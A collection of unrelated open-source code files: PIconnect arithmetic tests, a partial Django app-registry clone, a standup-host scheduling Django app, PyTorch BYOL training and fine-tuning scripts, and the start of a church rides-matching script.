#subprocess.call(["docker-compose", "-f", os.getenv("COMPOSE_SERVER"), "-c", "cloud" ,"up"], stderr=subprocess.DEVNULL)
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
``` |
{
"source": "jhvanderven/PIconnect",
"score": 3
} |
#### File: PIconnect/test/test_VirtualPIPoint_calculus.py
```python
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import (bytes, dict, int, list, object, range, str,
ascii, chr, hex, input, next, oct, open,
pow, round, super,
filter, map, zip)
# pragma pylint: enable=unused-import
import PIconnect as PI
from PIconnect.test.fakes import VirtualTestCase
class TestVirtualAddition(VirtualTestCase):
"""Test VirtualPIPoint addition."""
def test_add_integer_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point + 1
self.assertAlmostEqual(point2.current_value, self.values[-1] + 1)
def test_add_integer_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 1 + self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] + 1)
def test_add_pipoints_current_value(self):
"""Test adding two PIPoints via the current value."""
total = self.point + self.point
self.assertAlmostEqual(total.current_value,
self.values[-1] + self.values[-1])
class TestVirtualMultiplication(VirtualTestCase):
"""Test VirtualPIPoint addition."""
def test_multiply_integer_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 1
self.assertAlmostEqual(point2.current_value, self.values[-1] * 1)
def test_multiply_integer_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 1 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 1)
def test_multiply_pipoints_current_value(self):
"""Test adding two PIPoints via the current value."""
total = self.point * self.point
self.assertAlmostEqual(total.current_value,
self.values[-1] * self.values[-1])
def test_multiply_integer_two_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 2
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2)
def test_multiply_integer_two_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 2 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2)
def test_multiply_float_two_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 2.0
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2.0)
def test_multiply_float_two_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 2.0 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2.0)
``` |
{
"source": "Jhvcc/CustomizeDjango",
"score": 2
} |
#### File: django/apps/registry.py
```python
import functools
import sys
import threading
from collections import defaultdict, Counter
from django.apps.config import AppConfig
from django.core.exceptions import ImproperlyConfigured, AppRegistryNotReady
class Apps:
"""
注册settings INSTALLED_APPS的应用
"""
def __init__(self, installed_apps=()):
if installed_apps is None and hasattr(sys.modules[__name__], "apps"):
raise RuntimeError("You must supply an installed_apps argument.")
# Mapping of app labels => model names => model classes. Every time a
# model is imported, ModelBase.__new__ calls apps.register_model which
# creates an entry in all_models. All imported models are registered,
# regardless of whether they're defined in an installed application
# and whether the registry has been populated. Since it isn't possible
# to reimport a module safely (it could reexecute initialization code)
# all_models is never overridden or reset.
self.all_models = defaultdict(dict)
# 将app标签映射到已配置INSTALLED_APPS的应用实例
self.app_configs = {}
# 应用配置的堆栈, 用set_available_apps和set_installed_apps保存当前状态
self.stored_app_configs = []
# 判断应用是否已注册
self.apps_ready = self.models_ready = self.ready = False
# 专为自动加载
self.ready_event = threading.Event()
# 为线程安全上锁
self._lock = threading.RLock()
self.loading = False
# Maps ("app_label", "modelname") tuples to lists of functions to be
# called when the corresponding model is ready. Used by this class's
# `lazy_model_operation()` and `do_pending_operations()` methods.
self._pending_operations = defaultdict(list)
if installed_apps is not None:
self.populate(installed_apps)
def populate(self, installed_apps=None):
"""
加载配置和模型
导入每个应用模块以及相应的模型
这是线程安全且幂等的, 但不可重入
"""
if self.ready:
return
# 在初始化WSGI可调用函数之前, 在创建线程的服务器上, 可能会有两个线程并行执行populate()
# 所以需要上锁
with self._lock:
if self.ready:
return
# 上锁阻止其他进行执行, 以下的操作都具有原子性
if self.loading:
# 阻止重复调用, 避免AppConfig.ready()调用两次
raise RuntimeError("populate() isn`t reentrant")
self.loading = True
# 阶段1: 初始化应用程序配置并导入应用程序模块
for entry in installed_apps:
if isinstance(entry, AppConfig):
app_config = entry
else:
app_config = AppConfig.create(entry)
if app_config.label in self.app_configs:
raise ImproperlyConfigured(
"Application labels aren't unique, "
"duplicates: %s" % app_config.label
)
self.app_configs[app_config.label] = app_config
app_config.apps = self
# 检查重复的app names
counts = Counter(
app_config.name for app_config in self.app_configs.values()
)
duplicates = [name for name, count in counts.most_common() if count > 1]
if duplicates:
raise ImproperlyConfigured(
"Application names aren't unique, "
"duplicates: %s" % ", ".join(duplicates)
)
self.apps_ready = True
# 阶段2: 导入模型模块
for app_config in self.app_configs.values():
app_config.import_models()
self.clear_cache()
self.models_ready = True
# 阶段3: 运行ready()
for app_config in self.get_app_configs():
app_config.ready()
self.ready = True
self.ready_event.set()
# 对于django的测试套件来说, 这个方法是性能的关键
@functools.lru_cache(maxsize=None)
def get_models(self, include_auto_created=False, include_sapped=False):
"""
返回所有在INSTALLED_APPS里面的模型列表
- 自动为多对多关系创建模型, 不需要显式的创建中间表
- 被替换的模型
"""
self.check_models_ready()
def get_app_configs(self):
"""导入应用并返回app配置迭代器"""
self.check_apps_ready()
return self.app_configs.values()
def check_apps_ready(self):
"""如果所有的模型还没有被导入就报错"""
if not self.apps_ready:
from django.conf import settings
settings.INSTALLED_APPS
raise AppRegistryNotReady("Apps aren't loaded yet.")
def check_models_ready(self):
if not self.apps_ready:
from django.conf import settings
settings.INSTALLED_APPS
raise AppRegistryNotReady("Apps aren't loaded yet.")
def clear_cache(self):
"""
清除所有的内部缓存, 修改app注册的时候使用
经常在test中使用
"""
# 调用每个模型的过期缓存. 会清除所有的关系树和字段缓存
self.get_models.cache_clear()
apps = Apps(installed_apps=None)
```
#### File: django/utils/module_loading.py
```python
import sys
from importlib import import_module
from importlib.util import find_spec as importlib_find
def cached_import(module_path, class_name):
if not (
(module := sys.modules.get(module_path))
and (spec := getattr(module, "__spec__", None))
and getattr(spec, "_initializing", False) is False
):
module = import_module(module_path)
return getattr(module, class_name)
def import_string(dotted_path):
"""
通过字符串导入模块
"""
try:
module_path, class_name = dotted_path.rsplit(".", 1)
except ValueError as err:
raise ImportError("%s doesn't look like a module path" % dotted_path) from err
try:
return cached_import(module_path, class_name)
except AttributeError as err:
raise ImportError(
'Module "%s" does not define a "%s" attribute/class'
% (module_path, class_name)
) from err
def module_has_submodule(package, module_name):
try:
package_name = package.__name__
package_path = package.__path__
except AttributeError:
return False
full_module_name = package_name + "." + module_name
try:
return importlib_find(full_module_name, package_path) is not None
except ModuleNotFoundError:
return False
``` |
{
"source": "jhvhs/standup-pivots",
"score": 2
} |
#### File: management/commands/migratefromdublinstandup.py
```python
from django.core.management import BaseCommand, CommandError
from django.db import connection
class Command(BaseCommand):
help = "Migrate data from the app using the old name `dublinstandup` in postgres"
def __init__(self, stdout=None, stderr=None, no_color=False):
super().__init__(stdout, stderr, no_color)
self._cursor = connection.cursor()
@property
def cursor(self):
return self._cursor
def handle(self, *args, **options):
try:
self.migrate()
except RuntimeError as err:
raise CommandError("Unable to move the data\n{0}".format(err))
def migrate(self):
with self.cursor:
if self.is_data_present("standup_pivot"):
raise RuntimeError("Cowardly refusing to migrate - data exists in target tables")
if self.does_table_exist('dublinstandup_pivot'):
self.stdout.write("Migrating data from the pivot table")
self.migrate_pivots()
else:
raise RuntimeError("Unable to find `dublinstandup` app tables")
if self.does_table_exist('dublinstandup_schedule'):
self.stdout.write("Migrating data from the schedule table")
self.migrate_schedule()
elif self.does_table_exist('dublinstandup_standup'):
self.stdout.write("Migrating data from the standup table")
self.migrate_standup()
else:
raise RuntimeError("Unable to find `dublinstandup` app tables")
def does_table_exist(self, table_name):
self.stdout.write("Checking for presence of the `{0}` table".format(table_name))
self.cursor.execute("select count(*) from information_schema.tables where table_name like %s", (table_name,))
row = self.cursor.fetchone()
return (row is not None) and (row[0] == 1)
def does_column_exist(self, table_name, column_name):
self.stdout.write("Checking for presence of {0}.{1}".format(table_name, column_name))
self.cursor.execute(
"select count(*) from information_schema.columns where table_name like %s and column_name like %s",
(table_name, column_name))
def is_data_present(self, table_name):
self.cursor.execute("select count(*) from {0}".format(table_name))
row = self.cursor.fetchone()
return row[0] > 0
def migrate_pivots(self):
if self.does_column_exist("dublinstandup_pivots", "has_left_the_office"):
self.cursor.execute("insert into standup_pivot select * from dublinstandup_pivot")
else:
self.cursor.execute("""insert into standup_pivot(id, full_name, email, slack_handle, has_left_the_office)
select id, full_name, email, slack_handle, false from dublinstandup_pivot""")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
def migrate_schedule(self):
self.cursor.execute("insert into standup_standup select * from dublinstandup_schedule")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
def migrate_standup(self):
self.cursor.execute("insert into standup_standup select * from dublinstandup_standup")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
```
#### File: standup-pivots/standup/models.py
```python
from datetime import date, timedelta
from random import choice
from django.core.validators import EmailValidator
from django.db import models
from django.db.models import Max
from .validators import validate_monday
class Pivot(models.Model):
full_name = models.CharField(max_length=255)
email = models.CharField(max_length=255, validators=(EmailValidator(),))
slack_handle = models.CharField(max_length=255)
has_left_the_office = models.BooleanField(default=False)
def __str__(self):
return self.full_name
@property
def first_name(self):
return self.full_name.split(' ')[0]
@classmethod
def available(cls):
return cls.objects.filter(has_left_the_office=False)
@classmethod
def next_pivot_for_standup(cls):
new_pivot = cls.new_pivot_for_standup()
if new_pivot:
return new_pivot
return Pivot()
@classmethod
def new_pivot_for_standup(cls, excluded=None):
new_pivots = cls.available().filter(as_first_pivot__isnull=True, as_second_pivot__isnull=True)
if excluded is not None:
new_pivots = new_pivots.exclude(id=excluded.id)
if new_pivots.count() == 0:
new_pivots = cls._get_random_pivots()
new_id = choice(new_pivots.values_list('id', flat=True))
return cls.objects.get(pk=new_id)
@classmethod
def _get_random_pivots(cls):
skip_weeks = cls.available().count() / 5
skipped_pivots = cls._ids_for_pivots_running_standups_over_last_weeks(skip_weeks)
return cls.available().exclude(pk__in=skipped_pivots)
@classmethod
def _ids_for_pivots_running_standups_over_last_weeks(cls, number_of_weeks):
last_scheduled_standup = Standup.objects.aggregate(Max("week_start"))['week_start__max']
skip_upto_date = last_scheduled_standup - timedelta(weeks=number_of_weeks - 1)
recent_first_pivots = Pivot.objects.annotate(f=Max('as_first_pivot__week_start')).filter(f__gt=skip_upto_date)
recent_second_pivots = Pivot.objects.annotate(s=Max('as_second_pivot__week_start')).filter(s__gt=skip_upto_date)
return (recent_first_pivots | recent_second_pivots).distinct().values_list('id', flat=True)
class Standup(models.Model):
week_start = models.DateField(unique=True, validators=(validate_monday,))
first_pivot = models.ForeignKey('Pivot', on_delete=models.SET_NULL, related_name="as_first_pivot", null=True)
second_pivot = models.ForeignKey('Pivot', on_delete=models.SET_NULL, related_name="as_second_pivot", null=True)
def __str__(self):
return "Week of %s" % self.week_start
class Meta:
ordering = ('week_start',)
@classmethod
def current_standup(cls, weekday_index=date.today().weekday()):
qs = cls._get_current_standup(weekday_index)
if qs.count() == 0:
cls.plan(4)
qs = cls._get_current_standup(weekday_index)
return qs.first()
@classmethod
def _get_current_standup(cls, weekday_index):
if weekday_index < 5:
qs = cls.objects.filter(week_start__lte=date.today()).order_by('-week_start')
else:
qs = cls.objects.filter(week_start__gt=date.today())
return qs
@classmethod
def next_standup(cls):
return cls.current_standup(6)
@property
def following_standup(self):
return self.__class__.objects.filter(week_start__gt=self.week_start).first()
@classmethod
def plan(cls, week_count):
last_date = cls.objects.aggregate(Max("week_start"))['week_start__max']
last_date = max(last_date, _last_monday())
for i in range(week_count):
offset = timedelta(weeks=i + 1)
first_pivot = Pivot.new_pivot_for_standup()
second_pivot = Pivot.new_pivot_for_standup(excluded=first_pivot)
cls(week_start=last_date + offset, first_pivot=first_pivot, second_pivot=second_pivot).save()
def _this_monday():
current_weekday = date.today().weekday()
return date.today() - timedelta(current_weekday)
def _last_monday():
return _this_monday() - timedelta(7)
```
#### File: standup-pivots/standup/validators.py
```python
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
def validate_monday(d):
if d.weekday() != 0:
raise ValidationError(_("%s is supposed to be a Monday" % d))
```
#### File: standup-pivots/standup/views.py
```python
from django.http import HttpResponse
from django.template.response import SimpleTemplateResponse
from .models import Standup
from standup_pivots.settings import SITE_TITLE
SLACK_MESSAGE = "The standup hosts for the next week are <@{}> and <@{}>"
def index(request):
current_standup = Standup.current_standup()
return SimpleTemplateResponse('index.html', {
'standup': current_standup,
'following_standup': current_standup.following_standup,
'title': SITE_TITLE,
})
def slack_notification(request):
standup = Standup.next_standup()
return HttpResponse(SLACK_MESSAGE.format(standup.first_pivot.slack_handle, standup.second_pivot.slack_handle))
``` |
{
"source": "jhvics1/pytorch-byol",
"score": 2
} |
#### File: jhvics1/pytorch-byol/byol_finetune.py
```python
import os
import random
import argparse
import multiprocessing
import numpy as np
import torch
import torch.nn as nn
import torch.utils.data as data
from torchvision import models, transforms
import torchvision.datasets as datasets
from utils import Bar, config, mkdir_p, AverageMeter, accuracy
from datetime import datetime
from tensorboardX import SummaryWriter
def train(model, criterion, opt, softmax, bar, epoch, loader, losses, top1, top5, writer):
# for training
model.train()
for batch_idx, (inputs, labels) in enumerate(loader):
outputs = model(inputs.cuda())
outputs = softmax(outputs)
loss = criterion(outputs, labels.cuda())
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels.cuda().data, topk=(1, 5))
losses.update(loss.data.item(), inputs.size(0))
top1.update(prec1.item(), inputs.size(0))
top5.update(prec5.item(), inputs.size(0))
opt.zero_grad()
loss.backward()
opt.step()
# plot progress
bar.suffix = 'Epoch {epoch} - Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f} | ({batch}/{size})'.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(loader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
top1=top1.avg,
top5=top5.avg,
)
n_iter = epoch * len(loader) + batch_idx + 1
writer.add_scalar('Train/loss', loss.data.item(), n_iter)
writer.add_scalar('Train/top1', prec1.data.item(), n_iter)
writer.add_scalar('Train/top5', prec5.data.item(), n_iter)
bar.next()
writer.add_scalar('Avg.loss', losses.avg, epoch)
writer.add_scalar('Avg.top1', top1.avg, epoch)
writer.add_scalar('Avg.top5', top5.avg, epoch)
bar.finish()
def test(model, criterion, softmax, bar, epoch, loader, losses, top1, top5, writer):
model.eval()
for batch_idx, (inputs, labels) in enumerate(loader):
outputs = model(inputs.cuda())
outputs = softmax(outputs)
loss = criterion(outputs, labels.cuda())
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels.cuda().data, topk=(1, 5))
losses.update(loss.data.item(), inputs.size(0))
top1.update(prec1.item(), inputs.size(0))
top5.update(prec5.item(), inputs.size(0))
# plot progress
bar.suffix = 'Epoch {epoch} - Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f} | ({batch}/{size})'.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(loader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
top1=top1.avg,
top5=top5.avg,
)
n_iter = epoch * len(loader) + batch_idx + 1
writer.add_scalar('Test/loss', loss.data.item(), n_iter)
writer.add_scalar('Test/top1', prec1.data.item(), n_iter)
writer.add_scalar('Test/top5', prec5.data.item(), n_iter)
bar.next()
writer.add_scalar('Avg.loss', losses.avg, epoch)
writer.add_scalar('Avg.top1', top1.avg, epoch)
writer.add_scalar('Avg.top5', top5.avg, epoch)
bar.finish()
def main():
global parser, args, args
# arguments
parser = argparse.ArgumentParser(description='byol-lightning-test')
# Architecture & hyper-parameter
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet',
help='model architecture: | [resnet, ...] (default: resnet18)')
parser.add_argument('--depth', type=int, default=18, help='Model depth.')
parser.add_argument('-c', '--checkpoint', default='../checkpoints', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--epoch', type=int, default=100, help='Epoch')
parser.add_argument('--batch-size', type=int, default=32, help='Epoch')
parser.add_argument('--lr', '--learning-rate', default=1, type=float,
metavar='LR', help='initial learning rate')
parser.add_argument('--num-classes', type=int, default=100, help='Epoch')
parser.add_argument('--from-scratch', action='store_true', default=False,
help='use pre-trained model')
parser.add_argument('--tune-all', action='store_true', default=False,
help='use pre-trained model')
# Device options
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--model-path', '--mp', type=str,
help='byol trained model path')
# Paths
parser.add_argument('-d', '--dataset', default='neu', type=str)
parser.add_argument('--image_folder', type=str, required=True,
help='path to your folder of images for self-supervised learning')
parser.add_argument('--board-path', '--bp', default='../board', type=str,
help='tensorboardx path')
parser.add_argument('--board-tag', '--tg', default='fine-tuned', type=str,
help='tensorboardx writer tag')
args = parser.parse_args()
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Torch Seed
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
# Random Lib Seed
random.seed(args.manualSeed)
# Numpy Seed
np.random.seed(args.manualSeed)
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# constants
args.image_size = 256
args.workers = multiprocessing.cpu_count()
args.task_time = datetime.now().isoformat()
output_name = "{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
args.depth,
args.batch_size,
args.lr,
args.board_tag)
args.checkpoint = os.path.join(args.checkpoint, args.dataset, output_name, args.task_time)
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
writer_train = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time, "train"))
writer_test = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time, "test"))
if args.arch is "resnet":
if args.depth == 18:
model = models.resnet18(pretrained=False).cuda()
elif args.depth == 34:
model = models.resnet34(pretrained=False).cuda()
elif args.depth == 50:
model = models.resnet50(pretrained=False).cuda()
elif args.depth == 101:
model = models.resnet101(pretrained=False).cuda()
else:
assert ("Not supported Depth")
if not args.from_scratch:
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint)
print("\t==> Fine tune full layers? : {}".format(str(args.tune_all)))
# Simple manual fine tuning logic
# if full == False, only last layer will be fine tuned~!!
if not args.tune_all:
params = model.parameters()
for param in params:
param.requires_grad = False
model.num_classes = args.num_classes
num_ftrs = model.fc.in_features
model.fc = nn.Linear(num_ftrs, args.num_classes)
model = torch.nn.DataParallel(model).cuda()
opt = torch.optim.Adam(model.parameters(), lr=args.lr)
criterion = nn.CrossEntropyLoss().cuda()
softmax = nn.Softmax(1).cuda()
# Data loading code
traindir = os.path.join(args.image_folder, 'train')
testdir = os.path.join(args.image_folder, 'test')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
trainloader = torch.utils.data.DataLoader(
datasets.ImageFolder(traindir, transforms.Compose([
transforms.Resize(args.image_size),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(0.4, 0.4, 0.4),
transforms.ToTensor(),
# normalize,
])),
batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
testloader = torch.utils.data.DataLoader(
datasets.ImageFolder(testdir, transforms.Compose([
transforms.Resize(args.image_size),
transforms.ToTensor(),
# normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
losses_train = AverageMeter()
top1_train = AverageMeter()
top5_train = AverageMeter()
losses_test = AverageMeter()
top1_test = AverageMeter()
top5_test = AverageMeter()
for epoch in range(args.epoch):
bar_train = Bar('Processing', max=len(trainloader))
bar_test = Bar('Processing', max=len(testloader))
train(model, criterion, opt, softmax, bar_train, epoch, trainloader, losses_train, top1_train, top5_train,
writer_train)
test(model, criterion, softmax, bar_test, epoch, testloader, losses_test, top1_test, top5_test,
writer_test)
# save your improved network
torch.save(model.state_dict(), os.path.join(args.checkpoint, 'byol-finetune.pt'))
if __name__ == '__main__':
main()
```
#### File: jhvics1/pytorch-byol/byol_train.py
```python
import os
import random
import argparse
import multiprocessing
import numpy as np
import torch
from torchvision import models, transforms
from torch.utils.data import DataLoader, Dataset
from pathlib import Path
from PIL import Image
from utils import Bar, config, mkdir_p, AverageMeter
from datetime import datetime
from tensorboardX import SummaryWriter
from byol_pytorch import BYOL
# arguments
parser = argparse.ArgumentParser(description='byol-lightning-test')
# Architecture & hyper-parameter
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet',
help='model architecture: | [resnet, ...] (default: resnet18)')
parser.add_argument('--depth', type=int, default=18, help='Model depth.')
parser.add_argument('-c', '--checkpoint', default='../checkpoints', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--epoch', type=int, default=100, help='Epoch')
parser.add_argument('--batch-size', type=int, default=32, help='Epoch')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate')
# Device options
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--gpu-id', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
# Paths
parser.add_argument('-d', '--dataset', default='neu', type=str)
parser.add_argument('--image_folder', type=str, required=True,
help='path to your folder of images for self-supervised learning')
parser.add_argument('--board-path', '--bp', default='../board', type=str,
help='tensorboardx path')
parser.add_argument('--board-tag', '--tg', default='byol', type=str,
help='tensorboardx writer tag')
args = parser.parse_args()
# Use CUDA
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
use_cuda = torch.cuda.is_available()
# Torch Seed
# Random seed
if args.manualSeed is None:
args.manualSeed = random.randint(1, 10000)
# Random Lib Seed
random.seed(args.manualSeed)
# Numpy Seed
np.random.seed(args.manualSeed)
if use_cuda:
torch.cuda.manual_seed_all(args.manualSeed)
# constants
args.image_size = 256
NUM_GPUS = 1
IMAGE_EXTS = ['.jpg', '.png', '.jpeg', '.bmp']
NUM_WORKERS = multiprocessing.cpu_count()
# task_time = datetime.now().isoformat()
# args.checkpoint = os.path.join(args.checkpoint, args.dataset, "{}-{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
# args.depth,
# args.batch_size,
# args.lr,
# args.board_tag),
# task_time)
# if not os.path.isdir(args.checkpoint):
# mkdir_p(args.checkpoint)
# config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
#
# writer_train = SummaryWriter(
# log_dir=os.path.join(args.board_path, args.dataset, "{}-{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
# args.depth,
# args.batch_size,
# args.lr,
# args.board_tag),
# task_time, "train"))
args.task_time = datetime.now().isoformat()
output_name = "{}{:d}-bs{:d}-lr{:.5f}-{}".format(args.arch,
args.depth,
args.batch_size,
args.lr,
args.board_tag)
args.checkpoint = os.path.join(args.checkpoint, args.dataset, output_name, args.task_time)
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
config.save_config(args, os.path.join(args.checkpoint, "config.txt"))
writer_train = SummaryWriter(
log_dir=os.path.join(args.board_path, args.dataset, output_name, args.task_time))
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
def expand_greyscale(t):
return t.expand(3, -1, -1)
class ImagesDataset(Dataset):
def __init__(self, folder, image_size):
super().__init__()
self.folder = folder
self.paths = []
for path in Path(f'{folder}').glob('**/*'):
_, ext = os.path.splitext(path)
if ext.lower() in IMAGE_EXTS:
self.paths.append(path)
print(f'{len(self.paths)} images found')
self.transform = transforms.Compose([
transforms.Resize(args.image_size),
transforms.RandomSizedCrop((args.image_size, args.image_size)),
transforms.ColorJitter(0.4, 0.4, 0.4),
transforms.ToTensor(),
# normalize
])
def __len__(self):
return len(self.paths)
def __getitem__(self, index):
path = self.paths[index]
img = Image.open(path)
img = img.convert('RGB')
return self.transform(img)
if args.arch is "resnet":
if args.depth == 18:
model = models.resnet18(pretrained=False).cuda()
elif args.depth == 34:
model = models.resnet34(pretrained=False).cuda()
elif args.depth == 50:
model = models.resnet50(pretrained=False).cuda()
elif args.depth == 101:
model = models.resnet101(pretrained=False).cuda()
else:
assert ("Not supported Depth")
learner = BYOL(
model,
image_size=args.image_size,
hidden_layer='avgpool',
projection_size=256,
projection_hidden_size=4096,
moving_average_decay=0.99,
use_momentum=False # turn off momentum in the target encoder
)
opt = torch.optim.Adam(learner.parameters(), lr=args.lr)
ds = ImagesDataset(args.image_folder, args.image_size)
trainloader = DataLoader(ds, batch_size=args.batch_size, num_workers=NUM_WORKERS, shuffle=True)
losses = AverageMeter()
for epoch in range(args.epoch):
bar = Bar('Processing', max=len(trainloader))
for batch_idx, inputs in enumerate(trainloader):
loss = learner(inputs.cuda())
losses.update(loss.data.item(), inputs.size(0))
opt.zero_grad()
loss.backward()
opt.step()
# plot progress
bar.suffix = 'Epoch {epoch} - ({batch}/{size}) | Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} '.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(trainloader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
)
n_iter = epoch * len(trainloader) + batch_idx + 1
writer_train.add_scalar('Train/loss', loss.data.item(), n_iter)
bar.next()
writer_train.add_scalar('Avg.loss', losses.avg, epoch)
bar.finish()
# save your improved network
torch.save(model.state_dict(), os.path.join(args.checkpoint, 'byol.pt'))
``` |
{
"source": "jhwang73/nlf-rides-organizer",
"score": 3
} |
#### File: jhwang73/nlf-rides-organizer/rides_organizer.py
```python
import csv
import os
from collections import defaultdict
from pprint import pprint
from copy import deepcopy
from math import ceil
from collections import Counter
PREFERRED_PLAN = "preferred post church plan"
# gets the path to the filename that is in the same directory as this script
filename = "nlf_rides.csv"
path = os.getcwd() + "/" + filename
# duplicate check
users = set()
# drivers
ndrivers = []
sdrivers = []
odrivers = []
all_drivers = []
# riders
nriders = []
sriders = []
oriders = []
# final matches
matches = defaultdict(list)
preferences = defaultdict(str)
# have to manually match
unmatched = []
# process the raw csv
with open(path, newline = '', encoding="utf8") as csvfile:
reader = csv.reader(csvfile, delimiter=',')
for idx, row in enumerate(reader):
if idx == 0: continue
# takes care of people who signed up twice on accident
# make sure people know their first sign up is what counts
# we can come back later and change this to latest if it matters
if row[1] not in users: users.add(row[1])
else: continue
# mark their preference to refer to later
preferences[row[1]] = row[8]
# split into drivers
if row[6] == "Yes":
if row[4] == "North (Brown, Duncan, Jones, Martel, McMurtry)": ndrivers.append(row)
elif row[4] == "South (Baker, Hanszen, Lovett, <NAME>, Wiess, <NAME>)": sdrivers.append(row)
else: odrivers.append(row)
# and riders
else:
if row[4] == "North (Brown, Duncan, Jones, Martel, McMurtry)": nriders.append(row)
elif row[4] == "South (Baker, Hanszen, Lovett, <NAME>, Wiess, <NAME>)": sriders.append(row)
else: oriders.append(row)
all_drivers = ndrivers + sdrivers + odrivers
def load_balance():
# we're prioritizing proximity here over load balancing
# first we want to make sure there are enough north drivers
if len(ndrivers) * 4.0 / len(nriders) < 1.0:
num_drivers_needed = ceil((len(nriders) - len(ndrivers) * 4.0) / 4.0)
for _ in range(num_drivers_needed):
if odrivers: ndrivers.append(odrivers.pop())
else: ndrivers.append(sdrivers.pop())
def get_driver(dname):
for driver in all_drivers:
if dname == driver[1]:
return driver
raise ValueError("this driver does not exist in our records")
def match(riders, drivers):
'''
prioritizes people who have a strong after church preference
this can definitely be optimized but should work just fine for now
one more thing to consider is whether we should also only match on the
drivers who have preferences first, saving those who mark themselves flexible
'''
# first we split the riders into people who have preference and people who do not
# now assign a north driver to each north rider brute force
for rider in riders:
rname = rider[1]
matched = False
# the first pass is seeing if there is an optimal match possible
for driver in drivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5] and (driver[8] == rider[8] or driver[8] == "I'm flexible :)" or rider[8] == "I'm flexible :)"):
# since the driver now has a non flexible rider the driver is also now non flexible
if driver[8] != rider[8]: driver[8] = rider[8]
matched = True
matches[dname].append((rname, "optimal"))
break
if matched: continue
# if we get here then we know there wasn't an optimal match for after service
# but we'll at least try to match the service
for driver in ndrivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# if they get here, we could not find an appropriate match among the given set of drivers
# let's see if there are any other current drivers that have seats left
for dname in matches.keys():
driver = get_driver(dname)
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
if (driver[8] == rider[8] or rider[8] == "I'm flexible :)"): matches[dname].append((rname, "optimal"))
else: matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# we're trying to minimize the number of drivers that have to drive but
# let's see if there are any drivers that aren't listed to drive that can drive
for driver in all_drivers:
dname = driver[1]
if len(matches[dname]) >= 4: continue
if driver[5] == rider[5]:
matched = True
if (driver[8] == rider[8] or rider[8] == "I'm flexible :)"): matches[dname].append((rname, "optimal"))
else: matches[dname].append((rname, "non-optimal"))
break
if matched: continue
# if they got here we really were unable to either find a seat for them period
# or they don't have someone going to the same service as them
unmatched.append(rname)
def split_into_flexible(riders):
non_flexible = []
flexible = []
